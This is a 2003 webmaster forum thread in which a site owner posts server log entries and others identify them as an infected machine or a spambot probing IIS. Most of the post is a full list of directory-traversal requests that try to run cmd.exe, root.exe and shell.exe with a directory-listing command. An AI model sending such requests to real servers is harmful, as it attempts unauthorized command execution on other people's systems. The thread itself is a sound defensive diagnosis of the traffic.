Welcome to WebmasterWorld Guest from 54.144.68.27

Forum Moderators: Ocean10000 & incrediBILL

Message Too Old, No Replies

Indy Library - Chinese Spambot?

strange entries in my log file

     

bashyam

6:19 am on Apr 21, 2003 (gmt 0)

10+ Year Member



Hi,

I found these unrelated entries in my logs frequetly... could anyone let me know what it is?
------------------------------------------------------------
24.226.39.127 - - [21/Apr/2003:00:48:07 -0400] "GET /..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:08 -0400] "GET /..%c0%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:08 -0400] "GET /_vti_bin/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:09 -0400] "GET /_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 400 306 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:10 -0400] "GET /_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 400 306 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:10 -0400] "GET /_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:11 -0400] "GET /_vti_bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:12 -0400] "GET /_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:13 -0400] "GET /_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:14 -0400] "GET /_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:15 -0400] "GET /_vti_cnf/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:18 -0400] "GET /_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:19 -0400] "GET /adsamples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:20 -0400] "GET /adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:20 -0400] "GET /cgi-bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:21 -0400] "GET /cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:21 -0400] "GET /iisadmpwd/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:22 -0400] "GET /iisadmpwd/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:23 -0400] "GET /iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:24 -0400] "GET /iisadmpwd/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:25 -0400] "GET /msadc/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:26 -0400] "GET /MSADC/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 400 306 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:26 -0400] "GET /msadc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 400 306 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:27 -0400] "GET /MSADC/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 400 306 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:27 -0400] "GET /msadc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 400 306 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:28 -0400] "GET /msadc/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:29 -0400] "GET /msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:29 -0400] "GET /msadc/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:30 -0400] "GET /msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:31 -0400] "GET /msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:32 -0400] "GET /msadc/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:33 -0400] "GET /msadc/../%e0/%80/%af../../%e0/%80/%af../../%e0/%80/%af../winnt/system32/cmd.exe/?/c/+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:34 -0400] "GET /msdac/root.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:35 -0400] "GET /msdac/shell.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:36 -0400] "GET /PBServer/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 400 306 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:37 -0400] "GET /PBServer/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 400 306 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:46 -0400] "GET /PBServer/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:47 -0400] "GET /PBServer/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:48 -0400] "GET /Rpc/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 400 306 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:49 -0400] "GET /Rpc/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 400 306 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:49 -0400] "GET /Rpc/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:50 -0400] "GET /Rpc/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:51 -0400] "GET /samples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:52 -0400] "GET /samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:53 -0400] "GET /scripts..%c1%9c../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:54 -0400] "GET /scripts/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:55 -0400] "GET /scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:56 -0400] "GET /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:57 -0400] "GET /scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 400 306 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:49:00 -0400] "GET /scripts/..%C0%AF..%C0%AF..%C0%AF..%C0%AFwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:49:04 -0400] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:49:05 -0400] "GET /scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 400 306 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:49:05 -0400] "GET /scripts/..%C1%1C..%C1%1C..%C1%1C..%C1%1Cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:49:06 -0400] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:49:10 -0400] "GET /scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 400 306 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:49:10 -0400] "GET /scripts/..%C1%9C..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:49:11 -0400] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:49:12 -0400] "GET /scripts/..%c1%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:49:13 -0400] "GET /scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 400 306 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:49:14 -0400] "GET /scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:49:15 -0400] "GET /scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:49:15 -0400] "GET /scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:49:16 -0400] "GET /scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:49:17 -0400] "GET /scripts/root.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:49:18 -0400] "GET /scripts/shell.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
------------------------------------------------------------

Thanks..

Balaji.

jrobbio

6:42 am on Apr 21, 2003 (gmt 0)

10+ Year Member



Its a Chinese spam bot. Please be more selective with the category you choose for your posts. This is the Google section.

kwngian

8:15 am on Apr 21, 2003 (gmt 0)

10+ Year Member



>Its a Chinese spam bot.

It is a "compromised" spam bot.

The IP address says its canadian.

Even the spammers have their day for having an unpatch windows machine.

[edited by: kwngian at 10:26 am (utc) on April 21, 2003]

bashyam

8:51 am on Apr 21, 2003 (gmt 0)

10+ Year Member



Thanks for your reply.

Also, sorry to post this at Google section... by mistake I did that.

Balaji.

sullen

9:12 am on Apr 21, 2003 (gmt 0)

10+ Year Member



don't know where the chinese spam bot idea came from - it's a machine infected with the Code red / Nimda worm.

You can't block it. The best thing to do is look up the ip address to find out which company hosts the machine and then write to them.

bull

9:57 am on Apr 21, 2003 (gmt 0)

10+ Year Member



24.226.39.127 is not chinese:
Cogeco Cable Inc. COGECOWAVE-1 (NET-24-226-0-0-1) 
24.226.0.0 - 24.226.127.255

Apart from this, Indy Library is a candidate blocked by many here: [webmasterworld.com...]

jan

jrobbio

10:13 am on Apr 21, 2003 (gmt 0)

10+ Year Member


The Chinese bot thing came from a site and I quote:
[quote]Originally, the Indy Library is a programming library which is available at http://www.nevrona.com/Indy or http://indy.torry.net under an Open Source license. This library is included with Borland Delphi 6, 7, C++Builder 6, plus all of the Kylix versions. Unfortunately, this library is hi-jacked and abused by some Chinese spam bots. All recent user-agents with the unmodified "Indy Library" string were of Chinese origin.[/quote]

sullen

12:03 pm on Apr 21, 2003 (gmt 0)

10+ Year Member



righty - missed the "Indy Library" part - I was just going on the addresses its trying to hit.

I would say contact the host is still the best advice though.

 

Featured Threads

Hot Threads This Week

Hot Threads This Month